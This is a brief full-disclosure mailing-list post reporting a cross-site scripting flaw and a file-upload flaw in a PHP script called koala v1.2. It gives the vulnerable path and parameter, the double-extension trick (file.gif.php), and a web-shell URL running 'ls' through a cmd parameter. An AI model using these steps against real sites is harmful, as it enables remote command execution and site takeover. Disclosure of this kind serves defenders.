[Full-disclosure] xss in php koala script v1.2

xss /info.php?user=xss and an upload vulnerability if you upload a file named file.gif.php /upload/file.gif.php?cmd=ls file.gif.php is attached...